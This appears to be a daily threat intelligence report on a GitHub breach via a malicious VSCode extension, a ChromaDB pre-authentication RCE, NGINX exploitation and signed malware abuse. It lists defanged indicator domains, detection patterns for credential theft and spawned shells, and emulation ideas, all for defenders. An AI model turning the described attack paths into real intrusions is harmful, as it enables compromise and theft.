Last Updated On
Signed Malware, Poisoned Pipelines, and AI Servers Left Open
Today’s window is defined by a confirmed GitHub internal breach linked to a malicious VSCode extension, a max severity unpatched ChromaDB RCE, active NGINX exploitation, and the wider consequences of signed malware abuse through Fox Tempest. The report also includes YellowKey and DirtyDecrypt PoCs, a Drupal emergency release warning, Microsoft identity abuse, and the 7 Eleven ShinyHunters breach. The common thread is simple: trust boundaries failed in developer tooling, exposed services, and signing infrastructure.
10
CVSS Score
8
IOC Count
13
Source Count
88
Confidence Score
CVE-2026-45829 CVE-2026-42945 CVE-2026-31635 CVE-2026-42897 YellowKey/GreenPlasma
TeamPCP, Fox Tempest, Vanilla Tempest, ShinyHunters, Rhysida, Akira, Qilin, BlackByte, INC, Oyster (malware), Lumma Stealer, Vidar
Technology, Software Development, Artificial Intelligence, Financial Services, Healthcare, Retail, Education, Government, Critical Infrastructure
Global, North America, Europe, Middle East and North Africa
Chapter 01 - Executive Overview
Today’s report is dominated by a dangerous combination: a confirmed software supply chain breach at GitHub, a max severity unpatched AI platform vulnerability in ChromaDB, and active exploitation of a critical NGINX flaw. The Fox Tempest takedown adds a separate but related lesson: attackers continue to monetize trust, whether through signed malware or poisoned developer pipelines. The net effect is a day where the weakest trust assumptions in software delivery, identity, and exposed infrastructure all failed at once.
The most urgent business risk is that a malicious VSCode extension was able to penetrate GitHub’s internal environment, which means developer tooling can no longer be treated as a low risk support function. The second major risk is ChromaDB, where unauthenticated code execution against exposed Python deployments can turn an AI backend into a full compromise path. The third is NGINX, where active exploitation means internet facing systems cannot wait for normal patch cycles.
Leadership should treat these incidents as a single strategic warning: the trust layer around software delivery, identity, and infrastructure is now a primary attack surface. Organizations need immediate credential rotation, extension review, exposure reduction, and patch verification, not a post incident retrospective.
Chapter 02 - Threat & Exposure Analysis
The exposure picture is broad but coherent. TeamPCP and the Shai Hulud wave show that software supply chains are now being attacked through developer tools, package publishers, and CI CD trust boundaries, while ChromaDB and NGINX show that exposed services can be turned into direct remote code execution paths. Fox Tempest adds a third exposure class: abuse of legitimate signing trust to make malware look safe enough to run.
TeamPCP activity is centered on malicious VSCode extension delivery, repository creation artifacts such as tpcp docs, and package tampering through npm workflows. The behavior aligns with supply chain compromise, credential theft, and unauthorized package publication. The fact that GitHub internally confirmed the breach increases the credibility of the entire cluster, even where some lower level technical details remain under attribution.
CVE 2026 45829 is the clearest single technical exposure in the report. The ChromaDB Python server processes attacker controlled model configuration before authentication, allowing arbitrary code execution through an exposed collection creation endpoint. This is a severe design flaw because exploitation needs only HTTP reachability and can be performed without valid credentials.
CVE 2026 42945 is the clearest active exploitation case. The NGINX rewrite module heap overflow is being exploited in the wild, and the affected footprint is large because NGINX sits in front of public web properties, APIs, and reverse proxy layers. Even where exploitation only yields denial of service, the operational impact can be immediate and visible.
Fox Tempest shows that signed binaries are no longer a reliable trust signal by themselves. If a malicious payload is delivered through a legitimate signing pipeline, endpoint and email controls that rely too heavily on signature status can fail open. That is a governance problem as much as a technical one.
Chapter 03 - Operational Response
Priority one is exposure reduction. Rotate credentials tied to GitHub workflows, npm publishing, developer machines, and any CI CD runner that could have handled the compromised VSCode extension or poisoned package activity. Remove unknown extensions, pin dependencies, and block the known TeamPCP domains at DNS and perimeter controls.
Priority two is urgent patching and isolation. Patch NGINX immediately where the vulnerable rewrite pattern exists, isolate or remove exposed ChromaDB Python servers, and move affected workloads to the Rust path where possible. For YellowKey and DirtyDecrypt, apply mitigations and kernel or platform updates while treating them as local access threats rather than internet scale threats.
Priority three is trust policy hardening. Review any allow lists or application control policies that treat signed binaries as inherently safe, because the Fox Tempest case shows that valid signing can be abused at scale. For AI systems, enforce network segmentation and authenticated front ends around vector databases and model loading paths.
2026 02 17: HiddenLayer discloses CVE 2026 45829 to ChromaDB maintainers.
2026 04 08: 7 Eleven unauthorized access occurs, later linked to ShinyHunters claims and victim notification.
2026 05 10 to 2026 05 19: TeamPCP and Shai Hulud supply chain activity expands across npm and developer tooling.
2026 05 13: CVE 2026 42945 is disclosed and patches begin appearing.
2026 05 17: DirtyDecrypt PoC is published.
2026 05 18: Drupal announces a highly critical emergency release.
2026 05 19 10:30 UTC: New Shai Hulud wave is observed.
2026 05 20: GitHub confirms the internal repository breach.
Chapter 04 - Detection Intelligence
TeamPCP and Shai Hulud rely on trusted automation boundaries. The malicious VSCode extension and npm package tampering use legitimate developer workflows to trigger execution, then steal tokens and republish poisoned artifacts. The notable technical pattern is abuse of build and publish automation rather than custom malware infrastructure alone.
ChromaDB CVE 2026 45829 is a pre authentication code execution flaw in the Python FastAPI path. The vulnerable sequence is configuration parsing, model loading, remote code trust, and only then authentication, which creates a dangerous execution before authorization condition. That means defenders should focus on traffic to the collections endpoint and any unexpected outbound model registry access from ChromaDB hosts.
NGINX CVE 2026 42945 is a heap overflow in rewrite handling. The practical defensive signal is not a specific malware hash but a pattern of crashing workers, abnormal rewrite related requests, and unexpected shell execution from NGINX processes. That makes behavioral telemetry more useful than static signatures.
Fox Tempest demonstrates signed malware delivery at scale. The key technical lesson is that certificate presence, even when valid, should not end trust evaluation. Detection must combine signer reputation, file origin, execution context, and post launch behavior.
Known indicators include scan aquasecurtiy dot org, checkmarx dot zone, models litellm dot cloud, execution dot js, setup dot mjs, tpcp docs, the ChromaDB collections endpoint, and signspace dot cloud. The TeamPCP indicators are most useful for DNS and repository monitoring, while the ChromaDB endpoint is useful for web access monitoring and the Fox Tempest domain is useful for historical infrastructure review.
IOC enrichment remains pending because no consulted source provided passive DNS, hash reputation, WHOIS pivots, or sandbox verdicts. That means these indicators are actionable for hunting and blocking, but not yet ideal for durable reputation scoring
For TeamPCP, monitor GitHub audit logs for tpcp docs repository creation, watch for scripts preinstall changes that launch setup dot mjs, and alert on suspicious npm publish behavior from CI CD runners. Also monitor DNS and proxy telemetry for contacts to the known TeamPCP domains, and inspect developer endpoints for unauthorized VSCode extensions.
For ChromaDB, alert on HTTP POST activity to the collections endpoint that includes model loading parameters, trust remote code flags, or unexpected outbound requests to HuggingFace or other model registries. Process telemetry should also flag shells, interpreters, or child processes spawned by ChromaDB server processes.
For NGINX, focus on worker crashes, repeated SIGSEGV events, and traffic targeting rewrite heavy locations with unusual query and rewrite patterns. If the process launches shell commands or shows repeated crash loops on exposed instances, treat that as a strong exploitation signal.
For Fox Tempest related signed malware, watch for binaries signed with unusual or short lived certificates, especially where the file runs from temp or user writable locations and then behaves like ransomware or credential theft malware. Certificate trust should be one input, not the allow decision itself.
Confirmed ATT&CK mapping is limited to the following: T1195.001 for TeamPCP and Shai Hulud supply chain compromise, T1059.006 for the ChromaDB Python execution path, T1190 for public facing exploitation in ChromaDB and NGINX, T1552.004 for CI CD and publish credential theft, and T1078 for Microsoft identity and SSPR abuse. These are the only mappings supported strongly enough by the consulted sources to assign as formal techniques.
No additional ATT&CK mappings are assigned for DirtyDecrypt, YellowKey, or Fox Tempest because the consulted sources do not provide explicit technique IDs. Behavioral similarity alone is not enough for formal mapping in this report.
Chapter 05 - Governance, Risk & Compliance
The governance risk is that core trust systems are being abused across multiple layers at once. Software supply chain trust was exploited through GitHub, package publishing, and developer tooling. Infrastructure trust was exploited through NGINX. AI platform trust was exploited through ChromaDB. Signing trust was exploited through Fox Tempest.
For security leaders, the main control gap is overreliance on a single trust signal. Signed binaries, legitimate extensions, and authenticated internal tooling are useful but not sufficient on their own. Policy should require secondary checks such as behavioral telemetry, provenance controls, network segmentation, and privilege boundaries around build and publish systems.
Organizations with AI workloads should treat vector databases and model loading paths as governed production systems, not experimental support services. If these components store or process regulated data, then exposure, logging, and access review should meet the same standard used for ordinary databases and internet facing applications.
Chapter 06 - Adversary Emulation
For TeamPCP style activity, emulate a malicious extension installation on a controlled developer endpoint, then test whether your environment detects token theft, suspicious CI CD publishing, and rogue package versioning. Hunt for whether the organization can stop the spread before a poisoned package is released.
For ChromaDB style exploitation, simulate unauthenticated requests to the collections endpoint with unexpected model parameters and validate that your logging, egress controls, and service isolation prevent remote code execution from turning into data theft. The goal is to prove that the AI backend cannot freely reach external model registries without authorization.
For NGINX style exploitation, test whether your monitoring can detect rewrite related probes, worker crash loops, and unusual process spawning from the web tier. A mature defense should identify the exploitation pattern before service disruption becomes customer facing.
For Fox Tempest style signed malware, test whether application control, EDR, and email gateways still block malicious binaries when they are signed by a trusted issuer. If trust alone causes allow decisions, the control is too weak.
Factor | Assessment |
|---|---|
Primary source strength | High for ChromaDB and Fox Tempest, strong for GitHub, NGINX, and 7 Eleven, moderate for local PoC items |
Corroboration breadth | Strong across multiple consulted sources for the main incidents |
Technical specificity | High for ChromaDB, NGINX, and TeamPCP behaviors |
Attribution clarity | High for Fox Tempest and ShinyHunters, medium for TeamPCP, low for several vulnerability items |
IOC enrichment | Limited |
Remaining uncertainty | Present for some CVEs, one Drupal release, and local exploit timelines |